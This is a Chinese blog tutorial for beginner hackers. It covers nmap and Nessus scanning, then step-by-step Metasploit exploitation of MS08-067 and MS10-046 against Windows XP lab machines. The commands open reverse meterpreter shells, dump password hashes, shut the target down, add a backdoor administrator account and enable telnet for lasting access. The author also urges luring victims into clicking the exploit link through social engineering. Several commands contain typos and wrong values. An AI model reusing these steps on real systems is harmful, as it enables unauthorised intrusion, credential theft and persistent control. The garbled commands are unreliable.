现在介绍扫描漏洞并利用,主要包括,端口扫描,漏洞扫描,ms08_067漏洞利用,获取对方shell后提权等操作,其中有不明白的可以随时联系我,需要的工具我也会提供
端口扫描
1. 什么是端口
可以认为是设备与外界通讯交流的出口。
2. 扫描原理
存活性(是否在线,能否链接)扫描时用到的主要是ICMP。
端口扫描 主要利用的是三次握手(完整、不完整)的过程。
服务 根据端口判定,例如80端口代表web服务,20和21代表ftp服务。
指纹技术 是利用不同操作系统在TCP/IP协议在实现上的差别来识别操作系统甚至系统的版本号。
判断克隆的两个系统是否联通
将winXP-sp2系统进行完整克隆
将两个系统设置为同一个网络适配器下(如NAT模式),让其在相同的网段(或者手动更改为同一网段,例如192.168.91.131-192.168.91.132)
进行互相ping操作,看是否联通(判断存活),属于手动判断
3. 端口扫描工具及其使用
nmap、x-scan、superscan
网络配置方法,扫描网段写法192.168.1.1/24、192.168.1-200.1-255
使用zenmap是nmap的界面版,就是不用在命令行写代码,方便了许多
下面简单介绍一下关于zenmap扫描存活的主机,功能很强大
测试环境:kali64位,虚拟机中打开两个winXP系统,卡里官网可以下载安装,如果不方便可以给我留言,然后我给你发链接
在kali中搜索zenmap,点击打开图形界面
首先配置你所要搜索的主机IP地址范围,如果你准确知道目标的IP就可以直接输入固定的IP,
如果不确定就要知道哪个范围,例如,192.168.91.100-150,然后配置一下相关参数,一般情况下可以默认
也就是配置一下你要确定目标主机的详细信息。
下面配一张扫描到的同一网段的主机
系统漏洞扫描
1. 什么是漏洞
漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,
从而可以使攻击者能够在未授权的情况下访问或破坏系统。
2. 系统漏洞扫描原理
特征码探测 首先得有一个漏洞数据库,扫描时会向目标系统发送包含某一漏洞持征探测码的数据包,然后根据返回的数据包是否包含相应的特征码,来判断漏洞是否存在。
模拟攻击 是针对简单的操作,直接进行模拟黑客攻击来判断漏洞是否存在
3. 系统漏洞扫描工具
nessus下载 http://www.tenable.com/products/nessus/select-your-operating-system
激活官网 http://www.tenable.com/products/nessus-home
将nessus安装在虚拟机中,扫描其他主机
打开点击new scan,选择Advanced Scan扫描windows的漏洞
配置参数,主要设置目标主机的ip范围:例:192.168.91.100-192.168.91.150
保存之后,点击运行扫描
其中红色的部分,就是高危漏洞
内外网扫描问题解答
1. 什么是ip,什么是ipv4
网络之间互连的协议(IP)是Internet Protocol的外语缩写,中文缩写为“网协”.
IPv4,是互联网协议(Internet Protocol,IP)的第四版,也是第一个被广泛使用,构成现今互联网技术的基础的协议。
2. 什么是内外网
内网一般指局域网(Local Area Network,LAN)是指在某一区域内由多台计算机互联成的计算机组。
外网一般指广域网(WAN,Wide Area Network)也称远程网(long haul network )。
ms08_067漏洞利用
1. 搜索模块(如果搜索失败,显示请链接数据库,百度msf链接数据库即可)
2. 使用模块
3. 设置反弹链接
4. 设置攻击设置
5. 选择targets
6. 执行攻击
7. 获取shell
当你搜索或者扫描到其他系统的漏洞,例如ms0_067
步骤:
环境用kali攻击winXP
用ipconfig查看winXP的ip地址
用ifconfig查看kali(linx系统)的ip地址
在kali中打开metaploit软件工具(调用命令就会自动攻击)
首先搜索命令:search ms08_067,loop 之后的代码是它的模块
使用模块命令:user exploit/windows/smb/ms08_067_netali(例)
设置反弹链接命令:set PAYLOAD windows/meterpreter/reverse_tcp
设置攻击设置命令:show options,需要设置RHOST(目标主机),LHOST(本机)
设置LHOST:set 192.168.91.255
设置RHOST:set 192.168.91.132
选择targets命令:show targets,确定目标主机的类型
选择目标ID命令: set target 10
执行攻击命令:exploit
攻击成功则会进入meterpreter下
开始吧
查询账号密码命令:hashdump
获取对方shell命令:shell,会进入C:\windows\system32(对方的cmd)
将对方系统关机命令:shutdown -s
取消关机命令:shutdown -a
获取对方shell后提权
控制对方的shell(进入system32下),长久攻击
1. 新建一个账户(DOS命令)
net user zchao 123456 /add
2.加入管理员组
net localgroup administrators zc /add
3.打开telnet服务
sc config tlntsvr start= auto
net start telnet
telnet IP地址 远控
telnet 192.168.91.132
login:zc
password:123456
登陆成功
4. kali开启telnet服务失败解决方法(搜Ubuntu,命令一样)
http://blog.csdn.net/ziyunmuxu/article/details/51366359
点开网站就中招
1. 网站
windows安全公告网站:https://technet.microsoft.com/zh-cn/security/bulletins
2. 查找、扫描 (ms10_046漏洞)
手工去查,咱们用的免费版,肯定是功能受限制。
3. 利用过程(最重要的学会举一反三)
搜索模块,选用模块,设置反弹链接,配置模块,进行攻击
4. 关于网站域名和ip之间关系,以及如何骗取对方点击
域名和ip是对应的,通过dns解析,以后有详细课程。骗取对方点击请自行研究社会工程学
步骤:
kali中
search ms10_046
use exploit/windows/….
show options(SRVHOST,URIPATH)
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set SRVHOST 192.168.91.255(服务器)
set LHOST 192.168.91.132
show options
exploit
展示出一个URI地址
winXP中
在浏览器中输入上面的URI地址
再kali中有数据显示
kali中
sessions -l
sessions -i 1
shell
提权成功
更新msf及漏洞防护
1.学会更新msf等工具、可以直接更新kali
命令 1.apt-get update 2. apt-get upgrade 如果出错3.apt-get upgrade –fix-missing
2.如果msf连不上数据库
1. service postgresql start?2. service metasploit start 3. db_status?如果还不行,再输入4. msfdb init 如果还不行,重复以上步骤并重启
3.利用新漏洞的思路
查看msf所包含的漏洞,命令是show exploits,使用模块时要show options,看看能不能看懂,看看是不是能用上反弹链接,如果能,那就是老套路。不能的话,看看官方漏洞说明,还不会的话就得百度了。
4.系统没有漏洞不代表安装的软件没有漏洞
让我们愉快的学习,兴趣是你的指引,坚持才会让你不同。
背后的故事怎会轻易让他人了解…
Latest posts by zchao (see all)
- Auraでアクションボタン作成して画面のチェックボックス項目一括処理 - 2021年4月12日
- デフォルト項目値を含むレコード作成実例説明(defaultFieldValues) - 2021年1月9日
- Salesforce のノーコード・ローコード開発 - 2020年12月31日
转载请注明:zchao博客之家 » 黑客入门学习之扫描漏洞并利用